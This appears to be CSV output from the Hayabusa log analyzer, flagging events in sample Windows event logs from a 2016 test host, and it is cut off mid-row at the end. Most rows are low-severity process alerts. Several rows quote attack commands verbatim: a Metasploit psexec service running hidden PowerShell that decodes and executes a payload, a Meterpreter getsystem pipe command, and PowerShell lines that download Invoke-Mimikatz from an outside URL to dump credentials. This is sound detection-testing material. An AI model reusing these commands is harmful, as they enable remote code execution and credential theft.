2016-09-20 22:07:58.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:59.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:08:00.110 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xc1c | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:08:00.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc38 | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:08:01.982 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:10:32.160 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:20:59.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x87c | User: IEUser | LID: 0x6796c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:25:15.535 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:02:21.413 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x11c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:02:21.475 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:03:25.976 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x824 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:03:26.007 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:54:49.500 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:43.213 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.268 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xaf4 | User: IEUser | LID: 0x6796c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.377 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd08 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:45:12.871 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:45:18.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:45:25.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:46:27.941 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:46:32.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''[base64 blob removed]''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''[base64 blob removed]''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''[base64 blob removed]''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''[base64 blob removed]''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xb2c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''[base64 blob removed]''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x104 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('[base64 blob removed]'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x5fc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:27:39.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:27:42.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:27:42.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:27:44.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\g4g34pot.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xc58 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:28:55.689 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:28:55.705 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x924 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:28:58.267 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\wlqywrdm.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x71c | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:33:13.923 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\0xqpayvt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x920 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:41:27.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kwos13rh.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x760 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a0 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x700 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 04:15:49.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe80 | User: IE10WIN7$ | LID: 
